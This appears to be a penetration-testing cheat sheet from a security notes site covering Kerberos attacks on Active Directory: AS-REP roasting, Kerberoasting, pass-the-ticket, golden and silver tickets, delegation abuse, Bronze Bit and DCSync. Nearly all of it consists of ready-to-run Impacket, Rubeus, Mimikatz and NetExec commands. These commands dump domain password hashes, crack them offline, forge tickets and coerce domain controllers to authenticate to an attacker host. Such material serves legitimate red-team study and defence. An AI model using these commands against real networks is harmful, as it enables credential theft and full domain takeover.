KagisoSec_
AD Attacks
AD ATTACKS

Kerberos Attacks

AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver tickets, unconstrained/constrained/RBCD delegation abuse, Bronze Bit, and DCSync. Complete Rubeus + impacket reference.

active-directory kerberos rubeus impacket golden-ticket kerberoasting as-rep delegation

Kerberos is the authentication backbone of every AD environment. Every attack in this note exploits one of three weaknesses: weak encryption (AS-REP/Kerberoast), forged tickets (Golden/Silver), or trusted delegation (unconstrained/constrained/RBCD).

AS-REP Roasting

Accounts with DONT_REQ_PREAUTH flag set allow requesting a TGT without a password. The encrypted blob is crackable offline.

# Impacket — check user list without credentials
GetNPUsers.py corp.local/ -no-pass -usersfile users.txt -dc-ip DC_IP -format hashcat

# Impacket — with credentials
GetNPUsers.py corp.local/user:pass -request -format hashcat -dc-ip DC_IP

# NetExec
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt  # user list, no password

# Rubeus (Windows)
.\Rubeus.exe asreproast /nowrap /format:hashcat /outfile:asrep.txt

# PowerView — enumerate targets first
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname
# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Kerberoasting

Any authenticated domain user can request a TGS for any account with a Service Principal Name (SPN). The TGS is encrypted with the service account’s NTLM hash → crack offline.

# Impacket
GetUserSPNs.py corp.local/user:pass -dc-ip DC_IP -request -outputfile tgs.txt

# Impacket with hash
GetUserSPNs.py -hashes :NTLM_HASH corp.local/user -dc-ip DC_IP -request

# NetExec
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt

# Rubeus (Windows)
.\Rubeus.exe kerberoast /nowrap /outfile:tgs.txt

# Targeted (specific account)
.\Rubeus.exe kerberoast /user:sqlsvc /nowrap

# PowerView — request TGS and output directly
Invoke-Kerberoast -OutputFormat Hashcat | Select Hash | Out-File tgs.txt -Encoding ASCII
# Crack
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt

Targeted Kerberoasting (GenericWrite required)

When you have GenericWrite on a user: set a fake SPN, Kerberoast, then remove:

Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/spn.corp.local'}
Invoke-Kerberoast -Identity victim -OutputFormat Hashcat
Set-DomainObject -Identity victim -Clear serviceprincipalname

Pass-the-Ticket (PTT)

Inject a .ccache (Linux) or .kirbi (Windows) ticket into the current session:

# Linux — set environment variable
export KRB5CCNAME=/tmp/ticket.ccache
psexec.py -k -no-pass corp.local/user@TARGET_IP
wmiexec.py -k -no-pass corp.local/user@TARGET_IP
secretsdump.py -k -no-pass corp.local/user@DC_IP
# Windows — Rubeus
.\Rubeus.exe ptt /ticket:BASE64_TICKET
.\Rubeus.exe ptt /ticket:C:\Temp\ticket.kirbi

# Windows — Mimikatz
kerberos::ptt ticket.kirbi

# Verify injection
klist
dir \\TARGET\C$

Overpass-the-Hash (Pass-the-Key)

Convert an NTLM hash into a Kerberos TGT — authenticates via Kerberos, not NTLM:

# Impacket — get TGT, then use with PTT
getTGT.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass corp.local/user@TARGET_IP

# AES key (stealthier — no RC4 in logs)
getTGT.py corp.local/user -aesKey AES256_KEY -dc-ip DC_IP
# Rubeus — request TGT and inject
.\Rubeus.exe asktgt /user:jsmith /rc4:NTLM_HASH /ptt
.\Rubeus.exe asktgt /user:jsmith /aes256:AES256_KEY /ptt

# Mimikatz
sekurlsa::pth /user:jsmith /domain:corp.local /ntlm:NTLM_HASH /run:cmd.exe

Golden Ticket

Forge a TGT signed with the krbtgt hash — valid for any user, any group, 10 years by default. Requires krbtgt hash (from DCSync or domain admin session).

# Step 1 — get krbtgt hash
secretsdump.py -just-dc-user krbtgt corp.local/admin:pass@DC_IP
# Mimikatz: lsadump::dcsync /user:krbtgt

# Step 2 — forge ticket (Linux)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXXX -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass corp.local/Administrator@TARGET_IP

# Step 2 — forge ticket (Windows — Rubeus)
.\Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-XXXX /rc4:KRBTGT_HASH /ptt

# Mimikatz
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:HASH /ptt

Silver Ticket

Forge a TGS for a specific service using the service account’s hash. No KDC contact needed — operates offline.

# Impacket (Linux)
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-XXXX -domain corp.local \
  -spn CIFS/target.corp.local Administrator
export KRB5CCNAME=Administrator.ccache

# Rubeus (Windows)
.\Rubeus.exe silver /user:Administrator /service:cifs/target.corp.local \
  /rc4:SERVICE_HASH /domain:corp.local /sid:S-1-5-21-XXXX /ptt

# Mimikatz
kerberos::golden /user:Administrator /service:cifs /target:target.corp.local \
  /rc4:SERVICE_HASH /sid:S-1-5-21-XXXX /ptt

Common silver ticket SPNs: cifs/TARGET, host/TARGET, http/TARGET, mssqlsvc/TARGET:1433

Unconstrained Delegation

Computers with TrustedForDelegation store TGTs of all users that authenticate to them. Compromise the host → capture DA TGT.

# Enumerate (from Linux)
nxc ldap DC_IP -u user -p pass --trusted-for-delegation
# From Windows
Get-DomainComputer -Unconstrained | select dnshostname

# Rubeus monitor — capture incoming tickets on the compromised host
.\Rubeus.exe monitor /interval:5 /targetuser:Administrator

# Coerce DC auth (Printer Bug — forces DC to authenticate)
python3 printerbug.py 'corp.local/user:pass'@DC_IP ATTACKER_HOST_IP

# PetitPotam coercion
python3 PetitPotam.py -u user -p pass -d corp.local ATTACKER_HOST_IP DC_IP

# Extract and use TGT
.\Rubeus.exe ptt /ticket:BASE64_TGT

Constrained Delegation

Accounts with msDS-AllowedToDelegateTo set can impersonate any user to specific services.

# Enumerate
nxc ldap DC_IP -u user -p pass --find-delegation
Get-DomainUser -TrustedToAuth | select samaccountname, 'msds-allowedtodelegateto'
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'

# S4U2Self + S4U2Proxy — impersonate Administrator (Rubeus)
.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator \
  /msdsspn:CIFS/target.corp.local /ptt

# Impacket
getST.py -spn cifs/target.corp.local -impersonate Administrator \
  -dc-ip DC_IP corp.local/svc_account:pass
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local

Resource-Based Constrained Delegation (RBCD)

Write msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer object to allow a controlled account to delegate to it.

Requirements: GenericWrite/GenericAll/WriteDACL on the target computer object + a computer account you control.

# 1. Create fake computer account (if Machine Account Quota > 0)
addcomputer.py -computer-name 'EVILPC$' -computer-pass 'EvilPass123!' \
  corp.local/user:pass -dc-ip DC_IP

# 2. Set RBCD attribute on target
rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' \
  -action write corp.local/user:pass -dc-ip DC_IP

# 3. Request impersonation ticket
getST.py -spn cifs/TARGET.corp.local -impersonate Administrator \
  -dc-ip DC_IP corp.local/'EVILPC$:EvilPass123!'
export KRB5CCNAME=Administrator.ccache

# 4. Use the ticket
psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local
secretsdump.py -k -no-pass TARGET.corp.local
# Windows — PowerView + Rubeus
# Set RBCD
$target = Get-DomainComputer TARGET
$evilpc_sid = (Get-DomainComputer EVILPC$).objectsid
$sd = New-Object Security.AccessControl.RawSecurityDescriptor "D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$evilpc_sid)"
$sdBytes = New-Object byte[] ($sd.BinaryLength)
$sd.GetBinaryForm($sdBytes,0)
Set-DomainObject TARGET -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sdBytes}

# Request S4U ticket
.\Rubeus.exe s4u /user:EVILPC$ /rc4:EVILPC_HASH /impersonateuser:Administrator /msdsspn:cifs/TARGET /ptt

DCSync

Pull all domain hashes by mimicking a DC replication request. Requires Replicating Directory Changes All permission.

# secretsdump (Linux — most reliable)
secretsdump.py corp.local/user:pass@DC_IP -just-dc-ntlm
secretsdump.py corp.local/user:pass@DC_IP -just-dc-user krbtgt

# With hash
secretsdump.py -hashes :NTLM_HASH corp.local/user@DC_IP -just-dc-ntlm

# Mimikatz (Windows)
lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv

# NetExec
nxc smb DC_IP -u admin -p pass --ntds
nxc smb DC_IP -u admin -p pass --ntds vss

Bronze Bit (CVE-2020-17049)

Bypass constrained delegation PROTOCOL_TRANSITION restriction using a forged service ticket PAC.

# Requires: Python implementation (kerberos-enumeration.py or similar)
# Exploit: forge the "forwardable" flag in the PAC of a constrained delegation ticket
.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator \
  /msdsspn:cifs/target /bronzebit /ptt

Ticket Extraction from Memory

# Mimikatz — export all tickets from memory
kerberos::list /export

# Rubeus — dump all tickets in memory
.\Rubeus.exe dump /nowrap

# Rubeus — dump specific ticket
.\Rubeus.exe dump /user:Administrator /nowrap

# Rubeus — harvest TGTs continuously
.\Rubeus.exe harvest /interval:30